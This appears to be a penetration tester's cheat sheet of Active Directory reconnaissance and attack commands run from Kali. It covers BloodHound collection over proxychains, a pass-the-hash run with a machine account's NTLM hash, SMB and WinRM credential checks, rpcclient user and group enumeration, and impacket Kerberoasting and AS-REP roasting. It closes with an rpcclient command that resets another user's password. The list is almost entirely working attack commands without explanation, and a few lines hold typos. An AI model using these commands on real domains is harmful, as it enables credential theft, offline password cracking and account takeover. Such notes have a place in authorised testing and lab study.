Domain Recon - Kali

proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp

proxychains bloodhound-python3 -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM  -ns 172.16.76.168 --dns-tcp (Extract NTLM from /etc/krb5cc.keytab)

smbmap -H 10.9.20.10 -u kevin -p Passw0rd

crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'

crackmapexec smb 10.9.20.10

proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10

enumdomusers

queryuser 0x3601

proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator

enumdomgroups

querygroup 0x200

python3 impacket/example/GetUserSPNs.py red.com/ -no-pass -dc-ip 10.9.20.10 -userfile users.txt /fomat:hashcat

python3 impacket/example/GetNPUsers.py red.com/kevin:Passw0rd  -dc-ip 10.9.20.10

python3 impacket/example/getTGT.py red.com/kevin:Passw0rd

setuserinfo2 lawrencecohen 23 'Passw0rd'